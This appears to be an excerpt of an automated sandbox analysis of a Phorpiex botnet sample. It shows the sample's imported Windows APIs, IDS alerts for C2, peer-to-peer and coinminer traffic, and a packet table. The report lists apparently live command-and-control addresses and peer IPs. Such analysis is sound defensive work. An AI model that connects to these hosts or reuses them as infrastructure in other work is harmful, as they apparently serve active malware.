                                                                                                                  WS2_32.dllgethostname, recvfrom, setsockopt, bind, sendto, ioctlsocket, WSAStartup, shutdown, htons, socket, connect, WSAWaitForMultipleEvents, listen, WSASocketA, WSACreateEvent, WSAGetOverlappedResult, WSAEventSelect, WSAEnumNetworkEvents, WSAGetLastError, WSASend, WSARecv, WSACloseEvent, accept, getpeername, getsockname, inet_addr, gethostbyname, inet_ntoa, closesocket, recv, send
                                                                                                                  SHLWAPI.dllStrStrIA, StrCmpNW, StrStrW, PathFileExistsW, StrChrA, PathFindFileNameW, StrCmpNIA, PathMatchSpecW
                                                                                                                  urlmon.dllURLDownloadToFileW
                                                                                                                  WININET.dllHttpSendRequestA, InternetReadFile, InternetCloseHandle, HttpOpenRequestA, DeleteUrlCacheEntry, InternetConnectA, InternetOpenA, InternetCrackUrlA, HttpAddRequestHeadersA, HttpQueryInfoA, InternetOpenUrlA, InternetOpenUrlW, InternetOpenW
                                                                                                                  ntdll.dllstrlen, iswdigit, iswalpha, memcpy, memset, NtQueryVirtualMemory, RtlUnwind, _chkstk, _aulldiv, wcslen, wcscmp, _allshl, _aullshr, strstr, strcmp, memmove, memcmp, RtlTimeToSecondsSince1980, NtQuerySystemTime, mbstowcs
                                                                                                                  msvcrt.dll_vscprintf, srand, rand
                                                                                                                  KERNEL32.dllGetQueuedCompletionStatus, PostQueuedCompletionStatus, GetSystemInfo, MoveFileExW, SetEvent, CreateProcessW, GetLocaleInfoA, DeleteCriticalSection, GetCurrentThread, GetThreadPriority, SetThreadPriority, GetCurrentProcess, DuplicateHandle, IsBadReadPtr, InterlockedExchangeAdd, InterlockedIncrement, WaitForSingleObject, InterlockedDecrement, InterlockedExchange, HeapFree, HeapValidate, HeapReAlloc, GetProcessHeaps, HeapCreate, HeapSetInformation, GetCurrentProcessId, HeapAlloc, CreateMutexA, GetLastError, ExitProcess, ExpandEnvironmentStringsW, CreateEventA, CreateThread, GetModuleFileNameW, GetVolumeInformationW, GetDiskFreeSpaceExW, SetFileAttributesW, DeleteFileW, CopyFileW, lstrcmpiW, CreateDirectoryW, FindFirstFileW, lstrcmpW, CreateIoCompletionPort, FindNextFileW, FindClose, RemoveDirectoryW, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, lstrcpyW, WriteFile, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize, UnmapViewOfFile, lstrlenW, GlobalUnlock, GlobalLock, GlobalAlloc, lstrlenA, lstrcpynW, MultiByteToWideChar, ExitThread, GetTickCount, Sleep, GetModuleHandleW, CloseHandle
                                                                                                                  USER32.dllRegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, wsprintfW, DefWindowProcA, ChangeClipboardChain, RegisterRawInputDevices, GetClipboardData, DispatchMessageA, OpenClipboard, EmptyClipboard, SetClipboardData, IsClipboardFormatAvailable, SendMessageA, SetWindowLongW, SetClipboardViewer, GetWindowLongW, wsprintfA, wvsprintfA, CloseClipboard
                                                                                                                  ADVAPI32.dllCryptAcquireContextW, RegQueryValueExW, RegOpenKeyExW, RegSetValueExW, CryptReleaseContext, RegCloseKey, CryptGenRandom
                                                                                                                  SHELL32.dllShellExecuteW
                                                                                                                  ole32.dllCoInitializeEx, CoUninitialize, CoInitialize, CoCreateInstance
                                                                                                                  OLEAUT32.dllSysFreeString, SysAllocString

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-11-30T01:54:49.218533+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.449838185.215.113.665152TCP
                                                                                                                  2024-11-30T01:55:03.970185+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:03.970185+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449730185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:05.409561+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186182.188.65.5840500UDP
                                                                                                                  2024-11-30T01:55:06.450023+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:06.450023+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449732185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:10.423722+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618638.224.37.2440500UDP
                                                                                                                  2024-11-30T01:55:12.157808+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:12.157808+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449732185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:14.681534+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:14.681534+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449735185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:15.431185+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618677.44.192.4640500UDP
                                                                                                                  2024-11-30T01:55:20.218277+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:20.218277+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449735185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:20.327433+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449740185.215.113.8480TCP
                                                                                                                  2024-11-30T01:55:20.439271+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4561862.190.67.18440500UDP
                                                                                                                  2024-11-30T01:55:22.714304+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449743185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:22.714304+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449743185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:25.455137+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618689.218.218.20640500UDP
                                                                                                                  2024-11-30T01:55:28.694438+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449743185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:28.694438+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449743185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:28.767054+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974491.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:31.296399+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449745185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:31.296399+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449745185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:37.316536+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449745185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:37.316536+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449745185.215.113.6680TCP
                                                                                                                  2024-11-30T01:55:42.142585+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974791.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:42.142585+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974791.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:45.565435+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186189.150.7.2540500UDP
                                                                                                                  2024-11-30T01:55:45.697822+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974891.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:45.697822+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974891.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:49.224521+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974991.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:49.224521+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974991.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:50.566232+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186134.35.126.11240500UDP
                                                                                                                  2024-11-30T01:55:52.766364+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975191.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:52.766364+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44975191.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:55.425836+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975191.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:55.425836+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44975191.202.233.14180TCP
                                                                                                                  2024-11-30T01:55:55.604365+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4561862.176.90.1940500UDP
                                                                                                                  2024-11-30T01:56:00.283579+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449759185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:00.283579+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449759185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:00.680926+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186188.160.12.4940500UDP
                                                                                                                  2024-11-30T01:56:03.800114+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449771185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:03.800114+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449771185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:05.675239+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186134.35.107.9540500UDP
                                                                                                                  2024-11-30T01:56:07.426273+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449777185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:07.426273+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449777185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:11.086687+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449789185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:11.086687+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449789185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:14.741051+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449796185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:14.741051+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449796185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:15.689904+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4561862.135.246.1840500UDP
                                                                                                                  2024-11-30T01:56:19.363629+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44980791.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:19.363629+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44980791.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:20.718766+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4561862.177.228.23740500UDP
                                                                                                                  2024-11-30T01:56:23.171699+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981991.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:23.171699+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981991.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:25.733511+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618677.81.130.6040500UDP
                                                                                                                  2024-11-30T01:56:26.963611+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982791.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:26.963611+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982791.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:30.538736+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44983991.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:30.538736+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44983991.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:30.779181+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618691.185.130.16640500UDP
                                                                                                                  2024-11-30T01:56:34.305094+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44984791.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:34.305094+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44984791.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:35.814664+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186182.188.65.5840500UDP
                                                                                                                  2024-11-30T01:56:39.313398+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449860185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:39.313398+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449860185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:43.014699+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449869185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:43.014699+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449869185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:45.912158+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186195.158.21.7440500UDP
                                                                                                                  2024-11-30T01:56:46.805249+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449881185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:46.805249+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449881185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:50.427549+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449887185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:50.427549+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449887185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:51.540424+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186134.35.205.2940500UDP
                                                                                                                  2024-11-30T01:56:54.300804+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449899185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:54.300804+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449899185.215.113.6680TCP
                                                                                                                  2024-11-30T01:56:56.642308+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186198.163.193.9640500UDP
                                                                                                                  2024-11-30T01:56:59.115895+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44991191.202.233.14180TCP
                                                                                                                  2024-11-30T01:56:59.115895+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44991191.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:01.679030+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186134.35.104.9540500UDP
                                                                                                                  2024-11-30T01:57:02.821150+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44991891.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:02.821150+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44991891.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:06.858689+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618692.46.228.24640500UDP
                                                                                                                  2024-11-30T01:57:08.358969+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44993091.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:08.358969+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44993091.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:11.852789+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44994291.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:11.852789+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44994291.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:15.530794+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44994991.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:15.530794+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44994991.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:16.892516+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186217.30.160.21940500UDP
                                                                                                                  2024-11-30T01:57:20.251660+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449961185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:20.251660+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449961185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:22.261797+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186178.71.163.14140500UDP
                                                                                                                  2024-11-30T01:57:24.080280+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449970185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:24.080280+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449970185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:27.264625+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618641.138.38.16440500UDP
                                                                                                                  2024-11-30T01:57:27.874104+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449982185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:27.874104+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449982185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:31.929120+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449988185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:31.929120+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449988185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:32.282425+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186195.158.18.19440500UDP
                                                                                                                  2024-11-30T01:57:35.524932+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450000185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:35.524932+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450000185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:37.322689+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618689.249.62.8740500UDP
                                                                                                                  2024-11-30T01:57:40.230682+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45001191.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:40.230682+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45001191.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:43.928289+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45001791.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:43.928289+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45001791.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:47.362011+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618637.99.52.15040500UDP
                                                                                                                  2024-11-30T01:57:47.642419+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45002491.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:47.642419+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45002491.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:51.153754+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45003691.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:51.153754+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45003691.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:52.755253+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618680.191.218.20940500UDP
                                                                                                                  2024-11-30T01:57:54.672944+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45004791.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:54.672944+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45004791.202.233.14180TCP
                                                                                                                  2024-11-30T01:57:57.753210+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186176.113.143.7740500UDP
                                                                                                                  2024-11-30T01:57:59.556433+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450055185.215.113.6680TCP
                                                                                                                  2024-11-30T01:57:59.556433+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450055185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:02.768116+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4561862.190.67.18440500UDP
                                                                                                                  2024-11-30T01:58:03.392591+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450066185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:03.392591+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450066185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:06.983843+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450075185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:06.983843+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450075185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:07.784043+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4561865.219.134.10240500UDP
                                                                                                                  2024-11-30T01:58:10.587648+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450077185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:10.587648+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450077185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:12.799198+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186213.230.108.9240500UDP
                                                                                                                  2024-11-30T01:58:14.120601+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450078185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:14.120601+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450078185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:17.846192+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618682.200.169.18640500UDP
                                                                                                                  2024-11-30T01:58:18.867325+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45008091.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:18.867325+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45008091.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:22.848089+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186188.212.145.21440500UDP
                                                                                                                  2024-11-30T01:58:22.945317+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45008291.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:22.945317+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45008291.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:26.530530+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45008491.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:26.530530+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45008491.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:27.862672+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618691.185.146.15040500UDP
                                                                                                                  2024-11-30T01:58:30.003040+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45008691.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:30.003040+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45008691.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:33.434558+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186187.223.139.7340500UDP
                                                                                                                  2024-11-30T01:58:33.584224+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45008791.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:33.584224+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45008791.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:38.346062+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450089185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:38.346062+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450089185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:38.440011+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618689.249.62.8740500UDP
                                                                                                                  2024-11-30T01:58:42.080355+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450091185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:42.080355+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450091185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:45.636005+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450093185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:45.636005+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450093185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:48.472179+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618689.44.147.15740500UDP
                                                                                                                  2024-11-30T01:58:49.207695+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450094185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:49.207695+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450094185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:52.843123+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.450096185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:52.843123+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.450096185.215.113.6680TCP
                                                                                                                  2024-11-30T01:58:57.381150+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45009891.202.233.14180TCP
                                                                                                                  2024-11-30T01:58:57.381150+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45009891.202.233.14180TCP
                                                                                                                  2024-11-30T01:59:00.988438+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.45010091.202.233.14180TCP
                                                                                                                  2024-11-30T01:59:00.988438+01002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.45010091.202.233.14180TCP
                                                                                                                  2024-11-30T01:59:24.018155+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45618690.156.163.10140500UDP
                                                                                                                  2024-11-30T01:59:34.039261+01002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.456186198.163.193.22940500UDP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Nov 30, 2024 01:55:02.468049049 CET4973080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:02.588459015 CET8049730185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:02.588555098 CET4973080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:02.588855028 CET4973080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:02.708755016 CET8049730185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:03.970088959 CET8049730185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:03.970103025 CET8049730185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:03.970185041 CET4973080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:03.970443964 CET8049730185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:03.970619917 CET8049730185.215.113.66192.168.2.4
